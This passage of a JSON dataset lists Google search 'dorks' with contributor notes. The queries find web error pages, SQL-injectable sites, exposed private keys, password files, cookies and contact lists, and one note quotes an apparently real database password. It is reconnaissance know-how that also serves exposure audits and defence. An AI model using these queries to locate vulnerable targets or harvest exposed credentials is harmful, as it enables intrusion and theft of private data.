"intitle:Configuration.File inurl:softcart.exe", "description": "This search finds configuration file errors within the softcart application. It includes the name of the configuration file and discloses server file paths."}, {"dork": "\"Warning: mysql_query()\" \"invalid query\"", "description": "MySQL query errors revealing database schema and usernames."}, {"dork": "\"[SQL Server Driver][SQL Server]Line 1: Incorrect syntax near\" -forum -thread -showthread", "description": "you can find many servers infected with sql injection"}, {"dork": "\"Parse error: parse error, unexpected T_VARIABLE\" \"on line\" filetype:php", "description": "PHP error with a full web root path disclosure"}, {"dork": "\"There seems to have been a problem with the\" \" Please try again by clicking the Refresh button in your web browser.\"", "description": "search reveals database errors on vbulletin sites. View the page source and you can get information about the sql query executed, this can help in all manner of ways depending on the query."}, {"dork": "\"Warning:\" \"SAFE MODE Restriction in effect.\" \"The script whose uid is\" \"is not allowed to access owned by uid 0 in\" \"on line\"", "description": "This error message reveals full path information. Recommend use of site: operator to narrow searches."}, {"dork": "\"Warning: Division by zero in\" \"on line\" -forum", "description": "Just another error that reveals full paths."}, {"dork": "\"Warning: mysql_connect(): Access denied for user: '*@*\" \"on line\" -help -forum", "description": "This dork reveals logins to databases that were denied for some reason."}, {"dork": "\"Warning:\" \"failed to open stream: HTTP request failed\" \"on line\"", "description": "Just another error message."}, {"dork": "\"Warning: Bad arguments to (join|implode) () in\" \"on line\" -help -forum", "description": "and another error. open it from cache when not working."}, {"dork": "\"Unable to jump to row\" \"on MySQL result index\" \"on line\"", "description": "another error message"}, {"dork": "allintext:\"fs-admin.php\"", "description": "A foothold using allintext:\"fs-admin.php\" shows the world readable directories of a plug-in that enables Wordpress to be used as a forum. Many of the results of the search also show error logs which give an attacker the server side paths including the home directory name. This name is often also used for the login to ftp and shell access, which exposes the system to attack. There is also an undisclosed flaw in version 1.3 of the software, as the author has mentioned in version 1.4 as a security fix, but does not tell us what it is that was patched.\r\n\r\n\r\n\r\nAuthor: DigiP"}, {"dork": "inurl:\"*.php?*=*.php\" intext:\"Warning: include\" -inurl:.html -site:\"php.net\" -site:\"stackoverflow.com\" -inurl:\"*forums*\"", "description": "PHP Error Messages"}, {"dork": "\"[function.getimagesize]: failed to open stream: No such file or directory in\"", "description": "Just another error that reveals full paths"}, {"dork": "intitle:Error Page pageWrapper.jsp?", "description": "\"java.lang.NullPointerException\" Error\nThanks,\nXploit"}, {"dork": "intitle:Content Server Error IdcService=DOC_INFO", "description": "Oracle WebCenter Content\nContent Server Error\n-Xploit"}, {"dork": "inurl:/SAML2/SOAP/ | inurl:/SAML2/POST", "description": "Shibboleth Error XML\n-Xploit"}, {"dork": "inurl:/console-selfservice/common/scripts/calendar/ipopeng.htm", "description": "RSA Self-Service Console \"Error\"\n-Xploit"}, {"dork": "inurl:/smpwservices.fcc | \"/lm_private/CkeSetter.aspx\"", "description": "CA Technologies CA Single Sign-On (CA SSO) Error's. \n-Xploit"}, {"dork": "inurl:/siteminderagent/ | app:\"Error 404: java.io.FileNotFoundException: SRVE0190E: File not found: /siteminderagent/\"", "description": "CA Technologies CA Single Sign-On (CA SSO) Error's. \n-Xploit"}, {"dork": "intitle:\"DSM Terminator [ ABORT ]\" | inurl:\"./com.sap.portal.dsm.Terminator\"", "description": "DSM Terminator Error\n-Xploit"}, {"dork": "\"Below is a rendering of the page up to the first error.\" ext:xml", "description": "Some nice error messages that give you WAY too much info.\nDxtroyer"}, {"dork": "\"--- WebView Livescope Http Server Error ---\" -git", "description": "WebView server errors, mostly found on older servers\nDxtroyer"}, {"dork": "intitle:\"CGIWrap Error\"", "description": "Finds CGIWrap script errors containing some interesting information!\nDxtroyer"}, {"dork": "inurl:\".php?id=\" \"You have an error in your SQL syntax\"", "description": "This dork allows us to find websites that are possibly vulnerable to sql injections\ninurl:\".php?id=\" \"You have an error in your SQL syntax\"\nDrok3r"}, {"dork": "\"Error Diagnostic Information\" intitle:\"Error Occurred While\"", "description": "These aren't too horribly bad, but there are SO MANY of them. These sites got googlebotted while the site was having \"technical difficulties.\" The resulting cached error message gives lots of juicy tidbits about the target site."}, {"dork": "\"supplied argument is not a valid MySQL result resource\"", "description": "One of many potential error messages that spew interesting information. The results of this message give you real path names inside the webserver as well as more php scripts for potential \"crawling\" activities."}, {"dork": "\"Chatologica MetaSearch\" \"stack tracking:\"", "description": "There is soo much crap in this error message... Apache version, CGI environment vars, path names, stack-freaking-dumps, process ID's, perl version, yadda yadda yadda..."}, {"dork": "inurl:sitebuildercontent", "description": "This is a default directory for the sitebuilder web design software program. If these people posted web pages with default sitebuilder sirectory names, I wonder what else they got wrong?"}, {"dork": "inurl:sitebuilderfiles", "description": "This is a default directory for the sitebuilder web design software program. If these people posted web pages with default sitebuilder sirectory names, I wonder what else they got wrong?"}, {"dork": "inurl:sitebuilderpictures", "description": "This is a default directory for the sitebuilder web design software program. If these people posted web pages with default sitebuilder sirectory names, I wonder what else they got wrong?"}, {"dork": "intitle:\"the page cannot be found\" \"internet information services\"", "description": "This query finds various types of IIS servers. This error message is fairly indicative of a somewhat unmodified IIS server, meaning it may be easier to break into..."}, {"dork": "intitle:\"500 Internal Server Error\" \"server at\"", "description": "This one shows the type of web server running on the site, and has the ability to show other information depending on how the message is internally formatted."}, {"dork": "\"mySQL error with query\"", "description": "Another error message, this appears when an SQL query bails. This is a generic mySQL message, so there's all sort of information hackers can use, depending on the actual error message..."}, {"dork": "\"You have an error in your SQL syntax near\"", "description": "Another generic SQL message, this message can display path names and partial SQL code, both of which are very helpful for hackers..."}, {"dork": "\"Supplied argument is not a valid MySQL result resource\"", "description": "Another generic SQL message, this message can display path names, function names, filenames and partial SQL code, all of which are very helpful for hackers..."}, {"dork": "\"ORA-00936: missing expression\"", "description": "A generic ORACLE error message, this message can display path names, function names, filenames and partial database code, all of which are very helpful for hackers..."}, {"dork": "\"ORA-00921: unexpected end of SQL command\"", "description": "Another generic SQL message, this message can display path names, function names, filenames and partial SQL code, all of which are very helpful for hackers..."}, {"dork": "\"ORA-00933: SQL command not properly ended\"", "description": "An Oracle error message, this message can display path names, function names, filenames and partial SQL code, all of which are very helpful for hackers..."}, {"dork": "\"Unclosed quotation mark before the character string\"", "description": "An SQL Server error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..."}, {"dork": "\"Incorrect syntax near\"", "description": "An SQL Server error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..."}, {"dork": "\"Incorrect syntax near\" -the", "description": "An SQL Server error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..."}, {"dork": "\"PostgreSQL query failed: ERROR: parser: parse error\"", "description": "An PostgreSQL error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..."}, {"dork": "\"Supplied argument is not a valid PostgreSQL result\"", "description": "An PostgreSQL error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..."}, {"dork": "\"Syntax error in query expression \" -the", "description": "An Access error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..."}, {"dork": "\"An illegal character has been found in the statement\" -\"previous message\"", "description": "An Informix error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..."}, {"dork": "\"A syntax error has occurred\" filetype:ihtml", "description": "An Informix error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers"}, {"dork": "\"detected an internal error [IBM][CLI Driver][DB2/6000]\"", "description": "A DB2 error message, this message can display path names, function names, filenames, partial code and program state, all of which are very helpful for hackers..."}, {"dork": "An unexpected token \"END-OF-STATEMENT\" was found", "description": "A DB2 error message, this message can display path names, function names, filenames, partial code and program state, all of which are very helpful for hackers..."}, {"dork": "\"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL\"", "description": "This search reveals Postgresql servers in yet another way then we had seen before. Path information appears in the error message and sometimes database names."}, {"dork": "\"Warning: Cannot modify header information - headers already sent\"", "description": "A PHP error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..."}, {"dork": "\"access denied for user\" \"using password\"", "description": "Another SQL error message, this message can display the username, database, path names and partial SQL code, all of which are very helpful for hackers..."}, {"dork": "intitle:\"Under construction\" \"does not currently have\"", "description": "This error message can be used to narrow down the operating system and web server version which can be used by hackers to mount a specific attack."}, {"dork": "\"Can't connect to local\" intitle:warning", "description": "Another SQL error message, this message can display database name, path names and partial SQL code, all of which are very helpful for hackers..."}, {"dork": "filetype:asp \"Custom Error Message\" Category Source", "description": "This is an ASP error message that can reveal information such as compiler used, language used, line numbers, program names and partial source code."}, {"dork": "warning \"error on line\" php sablotron", "description": "sablotron is an XML toolit thingie. This query hones in on error messages generated by this toolkit. These error messages reveal all sorts of interesting stuff such as source code snippets, path and filename info, etc."}, {"dork": "intitle:\"Error Occurred\" \"The error occurred in\" filetype:cfm", "description": "This is a typical error message from ColdFusion. A good amount of information is available from an error message like this including lines of source code, full pathnames, SQL query info, database name, SQL state info and local time info."}, {"dork": "intitle:\"Execution of this script not permitted\"", "description": "This is a cgiwrap error message which displays admin name and email, port numbers, path names, and may also include optional information like phone numbers for support personnel."}, {"dork": "\"error found handling the request\" cocoon filetype:xml", "description": "Cocoon is an XML publishing framework. It allows you to define XML documents and transformations to be applied on it, to eventually generate a presentation format of your choice (HTML, PDF, SVG). For more information read http://cocoon.apache.org/2.1/overview.htmlThis Cocoon error displays library functions, cocoon version number, and full and/or relative path names."}, {"dork": "\"Invision Power Board Database Error\"", "description": "These are SQL error messages, ranging from to many connections, access denied to user xxx, showing full path info to the php files etc.. There is an exploitable bug in version 1.1 of this software and the current version is 1.3 available for download on the site."}, {"dork": "intitle:\"Error using Hypernews\" \"Server Software\"", "description": "HyperNews is a cross between the WWW and Usenet News. Readers can browse through the messages written by other people and reply to those messages. This search reveals the server software, server os, server account user:group (unix), and the server administrator email address. Many of these messages also include a traceback of the files and linenumbers and a listing of the cgi ENV variables. An attacker can use this information to prepare an attack either on the platform or the script files."}, {"dork": "intitle:\"Error Occurred While Processing Request\"", "description": "Cold fusion error messages logging the SQL SELECT or INSERT statements and the location of the .cfm file on the webserver.An attacker could use this information to quickly find SQL injection points."}, {"dork": "intitle:\"htsearch error\" ht://Dig error", "description": "The ht://Dig system is a complete world wide web indexing and searching system for a domain or intranet. A list of publically available sites that use ht://Dig is available at http://www.htdig.org/uses.htmlht://Dig 3.1.1 - 3.2 has a directory traversal and file view vulnerability as described at http://www.securityfocus.com/bid/1026. Attackers can read arbitrary files on the system. If the system is not vulnerable, attackers can still use the error produced by this search to gather information such as administrative email, validation of a cgi-bin executable directory, directory structure, location of a search database file and possible naming conventions."}, {"dork": "intext:\"Warning: Failed opening\" \"on line\" \"include_path\"", "description": "These error messages reveal information about the application that created them as well as revealing path names, php file names, line numbers and include paths."}, {"dork": "PHP application warnings failing \"include_path\"", "description": "These error messages reveal information about the application that created them as well as revealing path names, php file names, line numbers and include paths.PS: thanks to fr0zen for correcting the google link for this dork (murfie, 24 jan 2006)."}, {"dork": "\"Internal Server Error\" \"server at\"", "description": "We have a similar search already, but it relies on \"500 Internal Server\" which doesn't appear on all errors like this one. It reveals the server administrator's email address, as well as a nice server banner for Apache servers. As a bonus, the webmaster may have posted this error on a forum which may reveal (parts of) the source code."}, {"dork": "filetype:php inurl:\"logging.php\" \"Discuz\" error", "description": "Discuz! Board error messages related to MySQL. The error message may be empty or contain path information or the offending SQL statement. All discuz! board errors seem to be logged by this php file.An attacker can use this to reveal parts of the database and possibly launch a SQL attack (by filtering this search including SELECT or INSERT statements)."}, {"dork": "\"ORA-12541: TNS:no listener\" intitle:\"error occurred\"", "description": "In many cases, these pages display nice bits of SQL code which can be used by an attacker to mount attacks against the SQL database itself. Other pieces of information revealed include path names, file names, and data sources."}, {"dork": "\"ASP.NET_SessionId\" \"data source=\"", "description": ".NET pages revealing their datasource and sometimes the authentication credentials with it. The complete debug line looks something like this for example:strConn\tSystem.String Provider=sqloledb;Network Library=DBMSSOCN;Data Source=ch-sql-91;Initial Catalog=DBLive;User Id=login-orsearch;Password=0aX(v5~di)>S$+*For quick fun an attacker could modify this search to find those who use Microsoft Access as their storage: It will not suprise the experienced security digger that these files are often in a downloadeble location on the server."}, {"dork": "databasetype. Code : 80004005. Error Description :", "description": "snitz forums uses a microsoft access databases for storage and the default name is \"Snitz_forums_2000.mdb\". The installation recommends changing both the name and the path. If only one is changed this database error occurs. An attacker may use this information as a hint to the location and the changed name for the database, thus rendering the forum vulnerable to hostile downloads."}, {"dork": "intext:\"Error Message : Error loading required libraries.\"", "description": "This throws up pages which contain \"CGI ERROR\" reports - which include the file (and line number) of the errors occurence, the version of Perl being used, detailed server information (of the form \"Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.3.2 mod_perl/1.26\"), usernames, setup file names, form / query information, port and path information, etc.. perfect for system-profiling!"}, {"dork": "intitle:\"404 SC_NOT_FOUND\"", "description": "This error message highlights potentially unpatched or misconfigured Netscape Application Server or iPlanet application servers. An inquisitive mind would probably want to manually alter the URL's returned by this query, just to see what other, more informative messages might be revealed. As these servers are already exhibiting a misconfiguration, this could lead to other vulnerabilities being discovered.Finally, these servers are running software that is a few years old now. An attacker may feel that because of this, there's a strong possibility that they're not patched-up fully either, making them potentially vulnerable to known exploits."}, {"dork": "intitle:\"Default PLESK Page\"", "description": "Plesk Server Administrator (PSA) is web based software that enables remote administration of web servers. It can be used on Linux and other systems that support PHP.The default page is an indication that no configuration has been done (yet) for the domain"}, {"dork": "\"Warning: Supplied argument is not a valid File-Handle resource in\"", "description": "This error message cqan reveal path information. This message (like other error messages) is often posted to help forums, although the message still reveals path info in this form. Consider using the site: operator to narrow search."}, {"dork": "filetype:asp + \"[ODBC SQL\"", "description": "This search returns more than just the one I saw already here. This one will return all ODBC SQL error pages including all data returned in the error. The information can range from simple data such as the table/row queried to full Database name etc.An attacker could take this information and use it to gain a foot hold into the SQL server and could use the information for an SQL injection attack."}, {"dork": "intitle:\"Apache Tomcat\" \"Error Report\"", "description": "Apache Tomcat Error messages. These can reveal various kinds information depending on the type of error."}, {"dork": "\"plugins/wp-db-backup/wp-db-backup.php\"", "description": "Many of the results of the search show error logs which give an attacker the server side paths including the home directory name. This name is often also used for the login to ftp and shell access, which exposes the system to attack. Author: ScOrPiOn"}, {"dork": "inurl:\"index.php?m=content+c=rss+catid=10\"", "description": "Author: eidelweiss http://host/index.php?m=content&c=rss&catid=5\tshow MySQL Error (table)"}, {"dork": "\"CHARACTER_SETS\" \"COLLATION_CHARACTER_SET_APPLICABILITY\"", "description": "\"CHARACTER_SETS\"+\"COLLATION_CHARACTER_SET_APPLICABILITY\"\nfind sql injectable site\ndiscoverd by shinrisama"}, {"dork": "intext:\"Fatal error: Class 'Red_Action' not found in\"", "description": "Dork to find Plugin errors in wordpress websites\nDork - intext:\"Fatal error: Class 'Red_Action' not found in\""}, {"dork": "inurl:advsearch.php?module= & intext:sql syntax", "description": "Exploit Title : SQLI Exploit\nGoogle Dork : inurl:advsearch.php?module= & intext:sql syntax\nDate : 19/3/2013\nExploit Author : Scott Sturrock\nEmail : f00bar'at'linuxmail'dot'org"}, {"dork": "intext:\"Access denied for\" intitle:\"Shopping cart\"", "description": "Here is a Dork I use in conjunction with sqlmap, for shopping carts with\nMySQL\nError messages.\nIt got 80.000 results.\nintext:\"Access denied for\" intitle:\"Shopping cart\""}, {"dork": "intext:\"Unexpected Problem Occurred!\" ext:aspx", "description": "This Error messages reveal a lot of info of servers. Enjoy xD.\nRootkit Pentester."}, {"dork": "intitle:Error-javax.el.ELException+error+xhtml", "description": "An Error Occurred:\n\"javax.el.ELException\" \nJava error and gives \n+ Stack Trace, + Component Tree, + Scoped Variables. \n-Xploit"}, {"dork": "intitle:\"Whoops! There was an error.\"", "description": "These error pages can contain database credentials.\ncontact: @geoffreyvdberge"}, {"dork": "inurl:index.php?id= intext:\"mysql_fetch_array\"", "description": "here's a dork to find sql injectable sites in general.\ninurl can be replaced to something different...\nthx,\nDenis Muhic"}, {"dork": "inurl:/uniquesig0/ or inurl:/uniquesig0/InternalSite/", "description": "Microsoft Forefront Unified Access Gateway - Error Pages/Logins/LogOffMsg's\n-Xploit"}, {"dork": "inurl:/nesp/app", "description": "Novell Access Manager and NetIQ Access Manager \nError:NIDPMAIN (No ESP card defined)\n-Xploit"}, {"dork": "inurl:\"id=\" & intext:\"MySQL Error: 1064\" & \"Session halted.\"", "description": "inurl:\"id=\" & intext:\"MySQL Error: 1064\" & \"Session halted.\"\nProduces about 11,000 results.\nAuthor: pHr0ZZy"}, {"dork": "intitle:\"Struts Problem Report\" intext:\"development mode is enabled.\"", "description": "intitle:\"Struts Problem Report\" intext:\"development mode is\nenabled.\"\nabout 51,600 apache struts apps in dev-mode.\npHr0ZZy"}, {"dork": "intext:\"expects parameter 1 to be resource, boolean given\" filetype:php", "description": "intext:\"expects parameter 1 to be resource, boolean given\" filetype:php\nReturns around 997,000 vulnerable mysql-based websites."}, {"dork": "inurl:index of driver.php?id=", "description": "# Exploit Title: Google dork to discover OS warnings\n# Google Dork:inurl:index of driver.php?id=\n# Exploit Author: @R0d3ntSquad\nSimple dork to reveal websites with a huge amount of errors"}, {"dork": "\"CakeRoutingException\" -site:github.com -site:stackoverflow.com -site:cakephp.org\"", "description": "To find out websites made with CakePHP Framework\r\n\r\n\r\nThanks\r\n\r\nKiran S"}, {"dork": "inurl:?wp-commentsrss2.php -git", "description": "inurl:?wp-commentsrss2.php -git\r\n\r\nThis dork show result that contain wp-commentsrss2.php\r\n\r\nManhNho"}, {"dork": "\"syd_apply.cfm\"", "description": "Find error pages for job applications, sometimes can contain juicy\r\ninformation.\r\n~ CrimsonTorso"}, {"dork": "\"dispatch=debugger.\"", "description": "# Exploit Title: CS-Cart debug and configuration information\r\n# Google Dork:\r\n\r\n\"dispatch=debugger.\"\r\n\r\n# Date: 28, Dec, 2018\r\n# Vendor Homepage:\r\nhttps://www.cs-cart.com/\r\n\r\n# Exploit Author: deadroot"}, {"dork": "inurl:/php-errors.log filetype:log", "description": "inurl:/php-errors.log filetype:log"}, {"dork": "site:com inurl:jboss filetype:log -github.com", "description": "Dork : site:com inurl:jboss filetype:log -github.com\r\n\r\nDescription : this dork gives you jboss error logs.\r\n\r\nAuthor : botsec0"}, {"dork": "filetype:php \"Notice: Undefined variable: data in\" -forum", "description": "Information Disclosure:\r\n\r\nfiletype:php \"Notice: Undefined variable: data in\" -forum"}, {"dork": "site:*/404/404.html intitle:\"404\"", "description": "Error 404 page:\r\n\r\nsite:*/404/404.html intitle:\"404\"\r\nsite:*/503.html intitle:\"503\" intext:\"Service Unavailable\"\r\nsite:*/403.html intitle:\"403 Forbidden\"\r\nsite:*/404.html intitle:\"404 Not Found\"\r\ninurl:\"/index.php/error-404\" intitle:\"Error 404\"\r\nsite:*/index.php/*/error-404 intitle:\"Error 404\"\r\nsite:*/500.* intitle:\"500 Internal Server Error\" intext:\"Internal Server Error\"\r\nintitle:\"IIS 8.0 Detailed Error - 404.0 - Not Found\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/Shibboleth.sso/SAML2/POST", "description": "Error Page:\r\n\r\nsite:*/Shibboleth.sso/SAML2/POST\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/cgi-sys/suspendedpage.cgi intitle:\"Account Suspended\"", "description": "Error Pages:\r\n\r\nsite:*/cgi-sys/suspendedpage.cgi intitle:\"Account Suspended\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/cgi-sys/defaultwebpage.cgi intext:\"SORRY!\"", "description": "Error Pages:\r\n\r\nsite:*/cgi-sys/defaultwebpage.cgi intext:\"SORRY!\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/wp-includes/Requests/php_errorlog", "description": "Error Pages:\r\n\r\nsite:*/wp-includes/Requests/php_errorlog\r\nsite:*/wp-includes/Requests/Hooks.php intext:\"Fatal error:Interface\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/wp-admin/maint/repair.php intext:\"define(WP_ALLOW_REPAIR,true);\"", "description": "Error Pages:\r\n\r\nsite:*/wp-admin/maint/repair.php intext:\"define(WP_ALLOW_REPAIR,true);\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/errors/report.php\" intext:\"There has been an error processing your request\"", "description": "Error Pages:\r\n\r\ninurl:\"/errors/report.php\" intext:\"There has been an error processing your request\"\r\nsite:*/errors/404.html\r\nsite:*/errors/error.html\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:elmah.axd ext:axd", "description": "# Google Dork : inurl:elmah.axd ext:axd\r\n\r\n# Category : Files Containing Juicy Info\r\n\r\n# Date : 11-11-2019\r\n\r\n# Author : Dhaiwat Mehta"}, {"dork": "intitle:\"Error log for /LM/\"", "description": "# Google Dork : intitle:\"Error log for /LM/\"\r\n\r\n# Category : File contains Juicy items\r\n\r\n# Date : 11-11-2019\r\n\r\n# Author : Dhaiwat Mehta"}, {"dork": "intext:\"sf_app\" + \"frontend sf_app_base_cache_dir:\"", "description": "symfony exposed environemnt settings and credentials\r\nnavigate to settings or config\r\n\r\nex16x41"}, {"dork": "intext:\"TCPDFtcpdf.php on line 17778\" -stackoverflow -wordpress -github", "description": "#Author: MiningOmerta\r\n#Google Dork that shows too much server information.\r\n\r\nintext:\"\\TCPDF\\tcpdf.php on line 17778\" -stackoverflow -wordpress -github"}, {"dork": "inurl:(\"/storage/logs/laravel.log\") AND intext:(\"local.ERROR\" | \"NULL.ERROR\" | \"EMERGENCY:\")", "description": "# Dork #\r\n\r\ninurl:(\"/storage/logs/laravel.log\") AND intext:(\"local.ERROR\" |\r\n\"NULL.ERROR\" | \"EMERGENCY:\")\r\n\r\nlaravel Error log."}, {"dork": "inurl:\"/WebResource.axd?d=\" AND intext:Error", "description": "# Dork #\r\n\r\ninurl:\"/WebResource.axd?d=\" AND intext:Error\r\n\r\nError Messages."}, {"dork": "inurl:\"index.php?id=\" intext:\"Warning: mysql_num_rows()\"", "description": "Author:Alperen Ergel\r\nDate: 01/04/2020\r\nDork:inurl:\"index.php?id=\" intext:\"Warning: mysql_num_rows()\"\r\nDescription: potential SQL errors and injection"}, {"dork": "intitle:\"index of\" errors.log", "description": "Dork: intitle:\"index of\" errors.log\r\nDescription: This Google dork lists out errors.log web server files for\r\nwebsites\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"my-errors.log\" OR \"my-errors.logs\"", "description": "# Google Dork: intitle:\"index of\" \"my-errors.log\" OR \"my-errors.logs\"\r\n\r\n# Juicy information including session IDs, user names, and more.\r\n\r\n# Date: 7/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"stacktrace.log\"", "description": "Dork: intitle:\"index of\" \"stacktrace.log\"\r\nDescription: This google dork lists out sensitive stack trace details for\r\nweb servers.\r\nAuthor: Abhi Chitkara"}, {"dork": "intext:\"Error Occurred While Processing Request\"", "description": "# Google Dork: intext:\"Error Occurred While Processing Request\"\r\n\r\n# Error messages.\r\n\r\n# Date: 22/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"Lucee\" \"Error (expression)\" -lucee.org", "description": "# Google Dork: \"Lucee\" \"Error (expression)\" -lucee.org\r\n# Error Messages\r\n# Date:19/07/2021\r\n# Exploit Author: J. Igor Melo"}], "Files Containing Juicy Info": [{"dork": "intitle:\"Ganglia\" \"Cluster Report for\"", "description": "These are server cluster reports, great for info gathering. Lesse, what were those server names again?"}, {"dork": "allinurl:/examples/jsp/snp/snoop.jsp", "description": "These pages reveal information about the server including path information, port information, etc."}, {"dork": "intitle:\"index of\" mysql.conf OR mysql_config", "description": "This file contains port number, version number and path info to MySQL server."}, {"dork": "intitle:\"Big Sister\" +\"OK Attention Trouble\"", "description": "This search reveals Internal network status information about services and hosts."}, {"dork": "inurl:\"/cricket/grapher.cgi\"", "description": "This search reveals information about internal networks, such as configuration, services, bandwidth."}, {"dork": "inurl:\"cacti\" +inurl:\"graph_view.php\" +\"Settings Tree View\" -cvs -RPM", "description": "This search reveals internal network info including architecture, hosts and services available."}, {"dork": "intitle:\"System Statistics\" +\"System and Network Information Center\"", "description": "This search reveals internal network information including network configuratino, ping times, services, and host info."}, {"dork": "BEGIN (CERTIFICATE|DSA|RSA) filetype:key", "description": "This search will find private key files... Private key files are supposed to be, well... private."}, {"dork": "BEGIN (CERTIFICATE|DSA|RSA) filetype:csr", "description": "This search will find private key files... Private key files are supposed to be, well... private."}, {"dork": "\"sets mode: +s\"", "description": "This search reveals secret channels on IRC as revealed by IRC chat logs."}, {"dork": "inurl:email filetype:mdb", "description": "Microsoft Access databases containing email information.."}, {"dork": "data filetype:mdb -site:gov -site:mil", "description": "Microsoft Access databases containing all kinds of 'data'."}, {"dork": "intitle:\"Index Of\" cookies.txt \"size\"", "description": "searches for cookies.txt file. On MANY servers this file holds all cookie information, which may include usernames, passwords, but also gives an attacker some juicy information on this users surfing habits."}, {"dork": "inurl:backup filetype:mdb", "description": "Microsoft Access database backups.."}, {"dork": "inurl:forum filetype:mdb", "description": "Microsoft Access databases containing 'forum' information .."}, {"dork": "intext:(password | passcode) intext:(username | userid | user) filetype:csv", "description": "CSV formatted files containing all sorts of user/password combinations. Results may vary, but are still interesting to the casual attacker.."}, {"dork": "inurl:profiles filetype:mdb", "description": "Microsoft Access databases containing (user) profiles .."}, {"dork": "filetype:fp5 fp5 -site:gov -site:mil -\"cvs log\"", "description": "These are various kinds of FileMaker Pro Databases (*.fp5 applies to both version 5 and 6)."}, {"dork": "filetype:fp3 fp3", "description": "These are FileMaker Pro version 3 Databases."}, {"dork": "filetype:fp7 fp7", "description": "These are Filemaker Pro version 7 databases files."}, {"dork": "mail filetype:csv -site:gov intext:name", "description": "CSV Exported mail (user) names and such."}, {"dork": "filetype:xls -site:gov inurl:contact", "description": "Microsoft Excel sheets containing contact information."}, {"dork": "filetype:xls inurl:\"email.xls\"", "description": "Our forum members never get tired of finding juicy MS office files. Here's one by urban that finds email addresses."}, {"dork": "inurl:\"putty.reg\"", "description": "This registry dump contains putty saved session data. SSH servers the according usernames and proxy configurations are stored here."}, {"dork": "filetype:pst pst -from -to -date", "description": "Finds Outlook PST files which can contain emails, calendaring and address information."}, {"dork": "ext:txt \"Final encryption key\"", "description": "IPSec debug/log data which contains user data and password hashes.Can be used to crack passwords."}, {"dork": "php-addressbook \"This is the addressbook for *\" -warning", "description": "php-addressbook shows user address information without a password."}, {"dork": "intitle:\"Multimon UPS status page\"", "description": "Multimon provide UPS monitoring services"}, {"dork": "filetype:blt \"buddylist\"", "description": "AIM buddylists."}, {"dork": "filetype:ctt Contact", "description": "This is for MSN Contact lists..."}, {"dork": "filetype:ctt \"msn\"", "description": "This will give msn contact lists .. modify the \"msn\" to what ever you feel is messenger related"}, {"dork": "inurl:\"bookmark.htm\"", "description": "Bookmarks for Netscape and various other browsers."}, {"dork": "intitle:\"web server status\" SSH Telnet", "description": "simple port scanners for most common ports"}, {"dork": "ext:DBF DBF", "description": "Dbase DAtabase file. Can contain sensitive data like any other database."}, {"dork": "ext:CDX CDX", "description": "Visual FoxPro database index"}, {"dork": "ext:ccm ccm -catacomb", "description": "Lotus cc:Mail Mailbox file"}, {"dork": "ext:DCA DCA", "description": "IBM DisplayWrite Document Content Architecture Text File"}, {"dork": "allinurl:cdkey.txt", "description": "cdkeys"}, {"dork": "ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:\"budget approved\") inurl:confidential", "description": "Although this search is a bit broken (the file extensions don't always work), it reveals interesting-looking documents which may contain potentially confidential information."}, {"dork": "intitle:\"admin panel\" +\"Powered by RedKernel\"", "description": "This finds all versions of RedKernel Referer Tracker(stats page) it just gives out some nice info"}, {"dork": "intitle:\"urchin (5|3|admin)\" ext:cgi", "description": "Gain access to Urchin analysis reports."}, {"dork": "intitle:Bookmarks inurl:bookmarks.html \"Bookmarks", "description": "AFAIK are the bookmarks of Firefox, Netscape and Mozilla stored in bookmarks.html. It is often uploaded to serve as a backup, so it could reveal some juicy information."}, {"dork": "intitle:\"Welcome to F-Secure Policy Manager Server Welcome Page\"", "description": "An attacker may want to know about the antivirus software running. The description says he can check the status of the F-Secure Policy Manager Server's Host Module. He can also check the status of the Console Module, but only if he's reading the page from the local host."}, {"dork": "(intitle:WebStatistica inurl:main.php) | (intitle:\"WebSTATISTICA server\") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob", "description": "WebStatistica provides detailed statistics about a web page. Normally you would have to login to view these statistics but the sites have put autologin on."}, {"dork": "inurl:/cgi-bin/pass.txt", "description": "Passwords"}, {"dork": "intext:ViewCVS inurl:Settings.php", "description": "CVs is a software used to keep track of changes to websites. You can review all updates and previous files wihtout actualy loging into CVS. It is possible to see password files, directory structure, how often is the website updated, previous code find exploits, etc."}, {"dork": "inurl:build.err", "description": "General build error file. Can tell what modules are installed, the OS the compiler the language, in theory usernames and passwords could probably be found too."}, {"dork": "intitle:\"LOGREP - Log file reporting system\" -site:itefix.no", "description": "Logrep is an open source log file Extraction and Reporting System by ITeF!x. This dork finds the logs that it creates."}, {"dork": "intitle:\"AppServ Open Project *\" \"AppServ is a merging open source software installer package\" -phpbb", "description": "Often includes phpinfo and unsecured links to phpmyadmin."}, {"dork": "filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS", "description": "This search locates private SSHHostkeys.\nAuthor: loganWHD"}, {"dork": "\"Cisco PIX Security Appliance Software Version\" + \"Serial Number\" + \"show ver\" -inurl", "description": "Google search for Pix Authorization Keys \nAuthor: fdisk"}, {"dork": "intitle:index.of mt-db-pass.cgi", "description": "These folks had the technical prowess to unpack the movable type files, but couldn't manage to set up their web servers properly. Check the mt.cfg files for interesting stuffs..."}, {"dork": 